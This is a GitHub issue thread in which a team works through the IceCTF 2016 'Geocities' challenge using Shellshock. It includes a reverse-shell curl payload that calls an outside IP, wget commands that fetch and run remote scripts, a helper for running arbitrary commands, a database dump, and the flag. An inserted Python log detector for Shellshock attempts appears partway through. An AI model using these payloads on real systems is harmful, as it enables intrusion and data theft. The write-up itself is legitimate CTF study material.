DeadpoolAndObjectOrientedProgramming / icectf-2016

IceCTF 2016 repo

Stage 3 - Geocities #42

Closed ikornaselur closed 8 years ago

ikornaselur commented 8 years ago

Description

I recently stumbled onto this old geocities site, it's a miracle that it's still up! It must be running some ancient technology and probably hasn't been updated in years, it's our lucky day boys!

Solution

Flag is: IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}

ikornaselur commented 8 years ago

I wanted to update you a little on what I have been up to at work lately. The company that I work at has been wanting to adapt this new database management system known as MySQL. So I have been learning the syntax and trying to set up a couple of test databases. It has been a really interesting experience, this is a great way to store large amounts of data.

One of the blog posts on the page. Some old MySQL exploit maybe?

koddsson commented 8 years ago

Asked about this on IRC since @stebbib has made the shellshock connection which gained us entry onto the server

image

koddsson commented 8 years ago

So we can gain reverse shell access at this point by issuing the following command on a machine we control:

netcat -lvvp 9999

and then connect to our machine from the geosites machine thusly using the shellshock exploit:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/178.62.54.99/9999 0>&1" http://geocities.vuln.icec.tf/

(replace the ip and port of the machine in the earlier step)
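
From the defender's side, the giveaway in the requests above is the `() {` function-definition prefix that CGI hands to bash through an environment variable, so it is worth showing how that shows up in ordinary web-server logs. The following is an added example, not part of this thread: a small Python detector that parses Apache "combined" access-log lines and flags any User-Agent or Referer value carrying that prefix. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Shellshock trigger: an exported function definition "() {" at the start of
# an environment-variable value. In CGI, request headers such as User-Agent
# and Referer become HTTP_USER_AGENT / HTTP_REFERER, so those header values
# are where the pattern lands.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format. Referer and User-Agent may contain \" escapes,
# hence the (?:[^"\\]|\\.)* sub-pattern instead of a plain [^"]*.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log (not captured from the challenge box). Line 2 carries
# the same User-Agent payload shape seen in this thread; line 3 puts the
# prefix in the Referer header instead.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Aug/2016:10:00:07 +0000] "GET / HTTP/1.1" 200 19 "-" "() { test;};echo \\"Content-type: text/plain\\"; echo; echo; /bin/cat /data/get_posts.pl"
10.0.0.9 - - [12/Aug/2016:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "() { :;}; echo vulnerable" "curl/7.47.0"
10.0.0.7 - - [12/Aug/2016:10:00:20 +0000] "GET /about.html HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text: str) -> List[Dict[str, object]]:
    """Scan every line; report each header field whose value starts a bash function definition."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than silently ignore a field
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append(
                    {
                        "line": lineno,
                        "ip": rec["ip"],
                        "field": field,
                        "request": rec["request"],
                        "value": rec[field],
                    }
                )
    return hits


def attempts_by_ip(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged requests per source address, useful for a quick triage view."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[str(h["ip"])] = counts.get(str(h["ip"]), 0) + 1
    return counts


if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {h['line']}: {h['ip']} via {h['field']} -> {h['value']!r}")
    print(attempts_by_ip(find_shellshock_attempts(SAMPLE_LOG)))
```

The regex is deliberately loose about whitespace between `()` and `{`, since that is what the vulnerable bash versions accepted; a server patched for the function-import bug will still log these requests, so the detector is a record of attempts, not of success.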

koddsson commented 8 years ago

Only problem right now is that issuing commands doesn't seem to be working at all; the connection gets killed before we can do anything. It's most likely due to this:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /fbash" http://geocities.vuln.icec.tf/

#!/bin/sh
set -e
trap "pgrep -u ctf | xargs kill -9" EXIT
/bin/bash $@

koddsson commented 8 years ago

We suspect that the flag is in the database that the website dips into to get the posts:

☁  ~  curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /data/get_posts.pl" http://geocities.vuln.icec.tf/

#!/usr/bin/perl

use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

ikornaselur commented 8 years ago

Okay, so I am able to drop in a script and run it:

  1. Create script in /opt/pub/foo.sh
  2. Download to the box:
curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/wget pub.rogueacid.ninja/test.sh -O /var/tmp/deadpool.sh 2>&1" http://geocities.vuln.icec.tf/
  3. Run:
curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/sh /var/tmp/deadpool.sh 2>&1" http://geocities.vuln.icec.tf/

koddsson commented 8 years ago

Solved!

We gathered together on Telegram to try to push through the "last 5%" that we felt was left of this challenge and figured out we could download remote scripts into /var/tmp/ and execute them for longer than through the shellshock exploit.

Whilst poking around we noticed a bunch more perl scripts and decided to take a look.

☁  geosites  ./exec.sh 'ls /var/tmp'

1.elf
1.pl
1.pl.1
1.pl.10
1.pl.11
1.pl.12
1.pl.13
1.pl.2
1.pl.3
1.pl.4
1.pl.5
1.pl.6
1.pl.7
1.pl.8
1.pl.9
2.pl
3.elf
3.pl
4.elf
5.elf
index.html

Looks like someone was doing some debugging. If this was part of the challenge or some other contestants being sloppy we're not sure but we started picking these files apart to see if there was anything good in 'em.

2.pl has a very similar feel to it as the get_posts.pl in /data, where some exploratory work on the database is being done:

#!/usr/bin/perl

use DBI;

($host, $user, $password, $port) = @ARGV;
$host ||= "icectf_mariadb";
$user ||= "geocities";
$password ||= "geocities";
$port ||= 3306;

$db_handle = DBI ->
        connect("DBI:mysql:geocities:$host:$port","$user","$password")
                or die ("connection failed: $DBI::errstr\n");

$getkey = $db_handle -> prepare("SHOW TABLES")
                or die ("SHOW TABLES failed: $DBI::errstr\n");

$getkey -> execute
                or die ("execute failed: $DBI::errstr\n");

print ("Tables in test database on $host, port $port\n");
while (@row = $getkey->fetchrow) {
        print "@row\n";
        }

Executing that file yields the following output:

☁  geosites  ./exec.sh 'perl /var/tmp/2.pl'

Tables in test database on icectf_mariadb, port 3306
47a6fd2ca39d2b0d6eea1c30008dd889
Posts

Now Posts we know from the get_posts.pl file but 47a6fd2ca39d2b0d6eea1c30008dd889 looks very juicy right now!

Luckily for us someone already wrote a bit of perl to get us that data that we wanted in 3.pl:

#!/usr/bin/perl

use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

my $sth = $dbh->prepare("SELECT * from 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

Let's see what's in this table!

☁  geosites  ./exec.sh 'perl /var/tmp/3.pl'

IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7};;

Success!!

koddsson commented 8 years ago

My exec.sh script was just a little alias for the shellshock vuln:

☁  geosites  cat exec.sh
curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -c '$1' 2>&1" http://geocities.vuln.icec.tf/

stebbib commented 8 years ago

Forgot to mention that I used a tool called Nikto that ran an analysis on the geocities site and was able to tell that it was vulnerable to the shellshock exploit and even gives out a referral code to the bug. Super nice.